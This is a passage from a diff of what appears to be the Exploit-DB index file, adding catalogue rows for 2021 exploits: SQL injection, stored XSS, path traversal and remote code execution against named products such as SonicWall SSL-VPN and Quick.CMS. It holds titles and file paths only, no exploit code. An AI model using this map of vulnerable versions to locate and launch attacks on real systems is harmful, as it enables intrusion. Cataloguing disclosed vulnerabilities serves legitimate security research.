Scripting",2020-07-26,"Peter Blue",webapps,php, 48716,exploits/ruby/webapps/48716.rb,"Rails 5.0.1 - Remote Code Execution",2020-07-26,"Lucas Amorim",webapps,ruby, -49294,exploits/php/webapps/49294.txt,"Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload",2020-12-21,"Ramón Vila Ferreres",webapps,php, 48720,exploits/php/webapps/48720.py,"eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution",2020-07-27,"Berk KIRAS",webapps,php, 48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware, 48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware, @@ -43685,3 +43684,11 @@ id,file,description,date,author,type,platform,port 49487,exploits/php/webapps/49487.rb,"Fuel CMS 1.4.1 - Remote Code Execution (2)",2021-01-28,"Alexandre ZANNI",webapps,php, 49488,exploits/aspx/webapps/49488.py,"Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)",2021-01-28,"Alexandre ZANNI",webapps,aspx, 49490,exploits/php/webapps/49490.txt,"WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution",2021-01-28,ABDO10,webapps,php, +49492,exploits/php/webapps/49492.txt,"BloofoxCMS 0.5.2.1 - 'text' Stored Cross Site Scripting",2021-01-29,LiPeiYi,webapps,php, +49493,exploits/php/webapps/49493.txt,"Online Grading System 1.0 - 'uname' SQL Injection",2021-01-29,"Ruchi Tiwari",webapps,php, +49494,exploits/php/webapps/49494.py,"Quick.CMS 6.7 - Remote Code Execution (Authenticated)",2021-01-29,mari0x00,webapps,php, +49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover",2021-01-29,Lyghtnox,webapps,python, +49496,exploits/php/webapps/49496.txt,"MyBB Hide Thread Content Plugin 1.0 - Information Disclosure",2021-01-29,0xB9,webapps,php, +49497,exploits/php/webapps/49497.txt,"Simple Public Chat Room 1.0 - Authentication Bypass SQLi",2021-01-29,"Richard Jones",webapps,php, +49498,exploits/php/webapps/49498.txt,"Simple Public Chat Room 1.0 - 'msg' Stored Cross-Site Scripting",2021-01-29,"Richard Jones",webapps,php, +49499,exploits/hardware/webapps/49499.py,"SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)",2021-01-29,"Darren Martyn",webapps,hardware,